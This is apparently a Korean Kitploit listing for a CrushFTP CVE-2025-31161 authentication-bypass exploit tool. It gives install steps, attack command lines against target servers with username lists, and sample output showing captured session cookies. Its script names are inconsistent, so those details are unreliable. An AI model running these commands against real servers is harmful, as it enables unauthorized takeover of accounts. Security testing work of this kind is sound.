Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-31161 — CrushFTP CVE-2025-31161 익스플로잇 도구 🔓 | Kitploit
도구/GitHubGitHub/tx-one/cve-2025-31161
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingAuthentication
GitHubtx-one/cve-2025-31161

CVE-2025-31161

CrushFTP CVE-2025-31161 익스플로잇 도구 🔓

저장소 보기
21년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CrushFTP CVE-2025-31161 Exploit Tool 🔓

취약한 CrushFTP 버전에서 CVE-2025-31161 취약점을 탐지 및 익스플로잇하는 고급 도구입니다.

CVE-2025-31161은 CrushFTP 웹 인터페이스의 심각한 인증 우회 취약점입니다. HTTP Authorization 헤더를 조작하여, 인증되지 않은 공격자가 올바른 비밀번호를 제공하지 않고도 유효한 사용자 이름으로 전체 액세스 권한을 얻을 수 있습니다.

영향을 받는 버전

CrushFTP 9.3.8

CrushFTP 9.3.9

CrushFTP 9.3.10

CrushFTP 9.3.11

CrushFTP 9.3.12

CrushFTP Enterprise 9.3.12.5 이전 버전

주요 기능 🚀

  • 자동 CrushFTP 버전 감지 및 취약점 확인
  • 신속한 사용자 열거를 위한 멀티스레드 자격 증명 테스트
  • 이중 인증 방식 지원 (Bearer Token 및 Basic Auth)
  • 세션 쿠키를 포함한 JSON 보고서 생성
  • 사용자 설정 가능한 스마트 재시도 메커니즘
  • 상세 로깅이 포함된 컬러 콘솔 출력
  • 취약한 버전 범위:
    • 9.3.8 ~ 9.3.12.5

요구 사항 📋

  • Python 3.8+
  • 필요 패키지:
    root@kitploit:~
    pip install requests colorama urllib3
    

설치 🛠️

  1. 의존성 설치:
root@kitploit:~
 pip install requests colorama urllib3
  1. 저장소 클론:
root@kitploit:~
 git clone https://github.com/TX-One/CVE-2025-31161.git
 cd CVE-2025-31161
 python3 tx-crush.py -h

사용법 🖥️

기본 명령어:

root@kitploit:~
python3 CVE-2025-31161.py -t https://target:8080 -u users.txt -o results.json

옵션:

root@kitploit:~
-h, --help            도움말 메시지 표시 후 종료
  -t, --target TARGET   대상 URL (예: https://example.com:8080)
  -u, --users USERS     사용자 이름 목록 파일
  -o, --output OUTPUT   출력 JSON 파일
  -T, --threads THREADS
                        스레드 수 (기본값: 5)
  --no-ssl              SSL 검증 비활성화
  --timeout TIMEOUT     요청 시간 초과 (기본값: 15)
  --retries RETRIES     재시도 횟수 (기본값: 3)
  --force               버전 확인 우회

고급 예제:

root@kitploit:~
python3 exploit.py
  -t https://vulnerable-server.com:8000
  -u ./wordlists/common_users.txt
  -o ./results/compromised.json
  -T 10
  --retries 5
  --timeout 20

출력 샘플 📄

root@kitploit:~
[
  {
    "target": "https://victim:8080",
    "user": "admin",
    "success": true,
    "method": "Bearer",
    "cookies": {"sessionID": "a1b2c3..."},
    "server_version": "CrushFTP/9.3.12"
  }
]
root@kitploit:~
[
  {
        "target": "http://victim:8080",
        "user": "admin",
        "success": false
    }
]

면책 조항: 이 프로젝트는 교육 및 보안 연구 목적으로만 제작되었습니다. 책임 있는 사용이 요구됩니다.

도구 다운로드